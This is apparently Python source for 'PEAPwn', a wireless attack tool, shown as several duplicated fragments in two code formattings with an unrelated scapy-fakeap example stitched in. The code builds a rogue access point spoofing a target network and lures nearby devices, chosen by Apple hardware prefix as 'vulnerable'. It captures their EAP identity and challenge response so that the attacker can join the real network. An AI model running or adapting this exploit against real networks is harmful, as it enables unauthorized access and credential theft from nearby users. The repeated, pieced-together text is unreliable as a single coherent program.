def run(self):
# Check root
check_root()
# Pi warning
if RUNNING_ON_PI:
debug_print(clr(Color.MAGENTA, "*** RUNNING ON PI ***"),
Level.CRITICAL)
# Setup interface
self.monitor_dev = set_monitor_mode(args['mon_if'])
self.mon_mac = get_if_hwaddr(args['mon_if'])
self.infra_mac = get_if_hwaddr(args['infra_if'])
conf.logLevel = 0 # Do not let scapy log anything
conf.iface = self.monitor_dev
# Create our rogue AP
self.ap = FakeAccessPoint(self.monitor_dev, 1, self.mon_mac, '1', True)
self.ap.addSSID(self.target_essid)
debug_print("[+] Spoofing %s." % (self.target_essid), Level.INFO)
# Start sniffing
sniff(
iface=self.monitor_dev,
prn=self.sniff_callback,
store=0,
filter="(ether dst host " + self.mon_mac + " or ether dst host " +
self.infra_mac +
") or wlan type mgt and (ether dst host ff:ff:ff:ff:ff:ff or ether dst host "
+ self.mon_mac + ")")
def run(self):
# Check root
check_root()
# Pi warning
if RUNNING_ON_PI:
debug_print(clr(Color.MAGENTA, "*** RUNNING ON PI ***"), Level.CRITICAL)
# Setup interface
self.monitor_dev = set_monitor_mode(args["mon_if"])
self.mon_mac = get_if_hwaddr(args["mon_if"])
self.infra_mac = get_if_hwaddr(args["infra_if"])
conf.logLevel = 0 # Do not let scapy log anything
conf.iface = self.monitor_dev
# Create our rogue AP
self.ap = FakeAccessPoint(self.monitor_dev, 1, self.mon_mac, "1", True)
self.ap.addSSID(self.target_essid)
debug_print("[+] Spoofing %s." % (self.target_essid), Level.INFO)
# Start sniffing
sniff(
iface=self.monitor_dev,
prn=self.sniff_callback,
store=0,
filter="(ether dst host "
+ self.mon_mac
+ " or ether dst host "
+ self.infra_mac
+ ") or wlan type mgt and (ether dst host ff:ff:ff:ff:ff:ff or ether dst host "
+ self.mon_mac
+ ")",
)
# This example is a simple 'hello world' for scapy-fakeap.
# An open network will be created that can be joined by 802.11 enabled devices.
# The AP configuration is specified in 'example.conf'.
from fakeap import FakeAccessPoint
ap = FakeAccessPoint.from_file('example.conf')
ap.run()
class PEAPwn():
def __init__(self):
self.mon_mac = None
self.infra_mac = None
self.monitor_dev = None
self.state = State.CATCH
self.identity = ""
self.identity_mac = None
self.target_essid = args['essid']
self.ap = None
self.challenge = "nothing!"
self.response = None
self.print_count = 0
self.exploiter = None
self.dom_sock = ChallengeDomSock()
self.wpa_proc = None
self.error_message = "unknown"
def write_config(self):
global wpa_supplicant_conf
fileHandler = open('peapwn.conf', 'w')
wpa_supplicant_conf = wpa_supplicant_conf.replace(
"${identity}", self.identity)
wpa_supplicant_conf = wpa_supplicant_conf.replace(
"${essid}", self.target_essid)
fileHandler.write(wpa_supplicant_conf)
fileHandler.close()
def start_wpa_supplicant(self):
# Write configuration for wpa_supplicant
self.write_config()
# Start wpa_supplicant
debug = ""
cur_stdout = subprocess.PIPE
cur_stderr = subprocess.PIPE
if (args['debug']):
debug = "-ddd"
cur_stdout = sys.stdout
cur_stderr = sys.stderr
self.wpa_proc = subprocess.Popen([
'../mods/hostap/wpa_supplicant/wpa_supplicant', '-Dwext',
'-i' + args['infra_if'], '-c./peapwn.conf', '-K', debug
],
stdout=cur_stdout,
stderr=cur_stderr,
close_fds=True)
def is_vulnerable(self, source_mac):
source_oui = source_mac[0:8].upper()
result = (source_oui in apple_oui)
if not result:
debug_print(
clr(
Color.GREY, "[*] Caught " + source_mac +
", but this device is not vulnerable."), Level.INFO)
return result
def sniff_callback(self, packet):
global args
try:
# Spoof stage
if self.state == State.CATCH:
if packet.type == 0x00: # Management
if packet.subtype == 4: # Probe request
ssid = packet[Dot11Elt].info
debug_print(
"Probe request for SSID %s by MAC %s" %
(ssid, packet.addr2), Level.DEBUG)
if ssid == self.target_essid or (
Dot11Elt in packet
and packet[Dot11Elt].len == 0):
self.ap.injectProbeResponse(
packet.addr2, self.target_essid)
elif packet.subtype == 0x0B: # Authentication
if packet.addr1 == self.mon_mac: # We are the receivers
if args['nooui']:
self.ap.sc = -1 # Reset sequence number
self.ap.injectAuthSuccess(packet.addr2)
else:
if self.is_vulnerable(packet.addr2):
self.ap.sc = -1
self.ap.injectAuthSuccess(packet.addr2)
elif (packet.subtype == 0x00
or packet.subtype == 0x02): # Association
if packet.addr1 == self.mon_mac: # We are the receivers
self.ap.injectAssociationSuccess(
packet.addr2, packet.subtype)
self.ap.injectEAPPacket(packet.addr2,
EAPCode.REQUEST,
EAPType.IDENTITY, None)
self.state = State.IDENTITYCAP
debug_print("[+] Waiting for identity response.",
Level.INFO)
self.timer = Timer(
10, self,
"device failed to answer identity request")
self.timer.start()
# Capture identity stage
if self.state == State.IDENTITYCAP:
if packet.type == 0x02 and packet.addr1 == self.mon_mac: # Data frames
if EAP in packet:
if packet[EAP].code == EAPCode.RESPONSE: # Responses
if packet[EAP].type == EAPType.IDENTITY:
raw_identity = str(packet[Raw])
if packet.addr1 == self.mon_mac:
self.identity = raw_identity[
0:len(raw_identity) - 4]
# EAP Identity Response
debug_print(
clr(
Color.GREEN,
"[+] Caught identity: '" +
self.identity +
"'. Starting wpa_supplicant."),
Level.INFO)
self.timer.restart(
20,
"wpa_supplicant failed to get challenge from AP. Make sure client certificates are disabled"
)
self.identity_mac = packet.addr2
self.start_wpa_supplicant()
self.state = State.CHALLENGECAP
if EAPOL in packet:
# Client did not see our initial identity request. Send it again!
if packet[EAPOL].type == 0x01:
self.ap.injectEAPPacket(packet.addr2,
EAPCode.REQUEST,
EAPType.IDENTITY, None)
# Wait for challenge from wpa_supplicant
if self.state == State.CHALLENGECAP:
self.challenge = self.dom_sock.wait()
# Start our exploit
self.timer.restart(
20,
"failed to get challenge response from target. Make sure the device is vulnerable"
)
self.exploiter = Exploiter(self.ap, self.identity_mac,
self.identity, self)
self.exploiter.start()
self.state = State.RESPONSECAP
# Wait for challenge response from device
if self.state == State.RESPONSECAP:
if packet.type == 0x02:
if packet.addr2 == self.identity_mac and packet.addr1 == self.mon_mac:
if EAP in packet:
if packet[EAP].type == EAPType.EAP_LEAP:
raw_data = str(packet[Raw])
self.response = raw_data[3:27]
if self.dom_sock.submit(self.response):
if len(self.response) == 24:
self.state = State.COMPLETE
else:
self.state = State.FAIL
self.error_message = "expected 24-byte challenge response, but got '%s'" % self.response
if self.state == State.COMPLETE:
debug_print(
clr(
Color.GREEN,
"[+] Attack successful. Run dhcpcd to get an IP address now."
), Level.INFO)
self.destroy()
if self.state == State.FAIL:
debug_print(
clr(
Color.RED, "[-] Attack failed. Reason: %s. Retrying." %
self.error_message), Level.CRITICAL)
if self.wpa_proc:
self.wpa_proc.kill()
if self.timer:
self.timer.stop = True
if self.exploiter:
self.exploiter.stop = True
self.state = State.CATCH
debug_print("[+] Spoofing %s." % (self.target_essid),
Level.INFO)
except Exception as err:
debug_print(clr(Color.RED, "[-] Unknown error: %s" % repr(err)),
Level.CRITICAL)
def destroy(self):
self.timer.stop = True
self.exploiter.stop = True
set_monitor_mode(self.monitor_dev, False)
exit()
def run(self):
# Check root
check_root()
# Pi warning
if RUNNING_ON_PI:
debug_print(clr(Color.MAGENTA, "*** RUNNING ON PI ***"),
Level.CRITICAL)
# Setup interface
self.monitor_dev = set_monitor_mode(args['mon_if'])
self.mon_mac = get_if_hwaddr(args['mon_if'])
self.infra_mac = get_if_hwaddr(args['infra_if'])
conf.logLevel = 0 # Do not let scapy log anything
conf.iface = self.monitor_dev
# Create our rogue AP
self.ap = FakeAccessPoint(self.monitor_dev, 1, self.mon_mac, '1', True)
self.ap.addSSID(self.target_essid)
debug_print("[+] Spoofing %s." % (self.target_essid), Level.INFO)
# Start sniffing
sniff(
iface=self.monitor_dev,
prn=self.sniff_callback,
store=0,
filter="(ether dst host " + self.mon_mac + " or ether dst host " +
self.infra_mac +
") or wlan type mgt and (ether dst host ff:ff:ff:ff:ff:ff or ether dst host "
+ self.mon_mac + ")")
class PEAPwn:
def __init__(self):
self.mon_mac = None
self.infra_mac = None
self.monitor_dev = None
self.state = State.CATCH
self.identity = ""
self.identity_mac = None
self.target_essid = args["essid"]
self.ap = None
self.challenge = "nothing!"
self.response = None
self.print_count = 0
self.exploiter = None
self.dom_sock = ChallengeDomSock()
self.wpa_proc = None
self.error_message = "unknown"
def write_config(self):
global wpa_supplicant_conf
fileHandler = open("peapwn.conf", "w")
wpa_supplicant_conf = wpa_supplicant_conf.replace("${identity}", self.identity)
wpa_supplicant_conf = wpa_supplicant_conf.replace("${essid}", self.target_essid)
fileHandler.write(wpa_supplicant_conf)
fileHandler.close()
def start_wpa_supplicant(self):
# Write configuration for wpa_supplicant
self.write_config()
# Start wpa_supplicant
debug = ""
cur_stdout = subprocess.PIPE
cur_stderr = subprocess.PIPE
if args["debug"]:
debug = "-ddd"
cur_stdout = sys.stdout
cur_stderr = sys.stderr
self.wpa_proc = subprocess.Popen(
[
"../mods/hostap/wpa_supplicant/wpa_supplicant",
"-Dwext",
"-i" + args["infra_if"],
"-c./peapwn.conf",
"-K",
debug,
],
stdout=cur_stdout,
stderr=cur_stderr,
close_fds=True,
)
def is_vulnerable(self, source_mac):
source_oui = source_mac[0:8].upper()
result = source_oui in apple_oui
if not result:
debug_print(
clr(Color.GREY, "[*] Caught " + source_mac + ", but this device is not vulnerable."), Level.INFO
)
return result
def sniff_callback(self, packet):
global args
try:
# Spoof stage
if self.state == State.CATCH:
if packet.type == 0x00: # Management
if packet.subtype == 4: # Probe request
ssid = packet[Dot11Elt].info
debug_print("Probe request for SSID %s by MAC %s" % (ssid, packet.addr2), Level.DEBUG)
if ssid == self.target_essid or (Dot11Elt in packet and packet[Dot11Elt].len == 0):
self.ap.injectProbeResponse(packet.addr2, self.target_essid)
elif packet.subtype == 0x0B: # Authentication
if packet.addr1 == self.mon_mac: # We are the receivers
if args["nooui"]:
self.ap.sc = -1 # Reset sequence number
self.ap.injectAuthSuccess(packet.addr2)
else:
if self.is_vulnerable(packet.addr2):
self.ap.sc = -1
self.ap.injectAuthSuccess(packet.addr2)
elif packet.subtype == 0x00 or packet.subtype == 0x02: # Association
if packet.addr1 == self.mon_mac: # We are the receivers
self.ap.injectAssociationSuccess(packet.addr2, packet.subtype)
self.ap.injectEAPPacket(packet.addr2, EAPCode.REQUEST, EAPType.IDENTITY, None)
self.state = State.IDENTITYCAP
debug_print("[+] Waiting for identity response.", Level.INFO)
self.timer = Timer(10, self, "device failed to answer identity request")
self.timer.start()
# Capture identity stage
if self.state == State.IDENTITYCAP:
if packet.type == 0x02 and packet.addr1 == self.mon_mac: # Data frames
if EAP in packet:
if packet[EAP].code == EAPCode.RESPONSE: # Responses
if packet[EAP].type == EAPType.IDENTITY:
raw_identity = str(packet[Raw])
if packet.addr1 == self.mon_mac:
self.identity = raw_identity[0 : len(raw_identity) - 4]
# EAP Identity Response
debug_print(
clr(
Color.GREEN,
"[+] Caught identity: '" + self.identity + "'. Starting wpa_supplicant.",
),
Level.INFO,
)
self.timer.restart(
20,
"wpa_supplicant failed to get challenge from AP. Make sure client certificates are disabled",
)
self.identity_mac = packet.addr2
self.start_wpa_supplicant()
self.state = State.CHALLENGECAP
if EAPOL in packet:
# Client did not see our initial identity request. Send it again!
if packet[EAPOL].type == 0x01:
self.ap.injectEAPPacket(packet.addr2, EAPCode.REQUEST, EAPType.IDENTITY, None)
# Wait for challenge from wpa_supplicant
if self.state == State.CHALLENGECAP:
self.challenge = self.dom_sock.wait()
# Start our exploit
self.timer.restart(
20, "failed to get challenge response from target. Make sure the device is vulnerable"
)
self.exploiter = Exploiter(self.ap, self.identity_mac, self.identity, self)
self.exploiter.start()
self.state = State.RESPONSECAP
# Wait for challenge response from device
if self.state == State.RESPONSECAP:
if packet.type == 0x02:
if packet.addr2 == self.identity_mac and packet.addr1 == self.mon_mac:
if EAP in packet:
if packet[EAP].type == EAPType.EAP_LEAP:
raw_data = str(packet[Raw])
self.response = raw_data[3:27]
if self.dom_sock.submit(self.response):
if len(self.response) == 24:
self.state = State.COMPLETE
else:
self.state = State.FAIL
self.error_message = (
"expected 24-byte challenge response, but got '%s'" % self.response
)
if self.state == State.COMPLETE:
debug_print(clr(Color.GREEN, "[+] Attack successful. Run dhcpcd to get an IP address now."), Level.INFO)
self.destroy()
if self.state == State.FAIL:
debug_print(
clr(Color.RED, "[-] Attack failed. Reason: %s. Retrying." % self.error_message), Level.CRITICAL
)
if self.wpa_proc:
self.wpa_proc.kill()
if self.timer:
self.timer.stop = True
if self.exploiter:
self.exploiter.stop = True
self.state = State.CATCH
debug_print("[+] Spoofing %s." % (self.target_essid), Level.INFO)
except Exception as err:
debug_print(clr(Color.RED, "[-] Unknown error: %s" % repr(err)), Level.CRITICAL)
def destroy(self):
self.timer.stop = True
self.exploiter.stop = True
set_monitor_mode(self.monitor_dev, False)
exit()
def run(self):
# Check root
check_root()
# Pi warning
if RUNNING_ON_PI:
debug_print(clr(Color.MAGENTA, "*** RUNNING ON PI ***"), Level.CRITICAL)
# Setup interface
self.monitor_dev = set_monitor_mode(args["mon_if"])
self.mon_mac = get_if_hwaddr(args["mon_if"])
self.infra_mac = get_if_hwaddr(args["infra_if"])
conf.logLevel = 0 # Do not let scapy log anything
conf.iface = self.monitor_dev
# Create our rogue AP
self.ap = FakeAccessPoint(self.monitor_dev, 1, self.mon_mac, "1", True)
self.ap.addSSID(self.target_essid)
debug_print("[+] Spoofing %s." % (self.target_essid), Level.INFO)
# Start sniffing
sniff(
iface=self.monitor_dev,
prn=self.sniff_callback,
store=0,
filter="(ether dst host "
+ self.mon_mac
+ " or ether dst host "
+ self.infra_mac
+ ") or wlan type mgt and (ether dst host ff:ff:ff:ff:ff:ff or ether dst host "
+ self.mon_mac
+ ")",
)
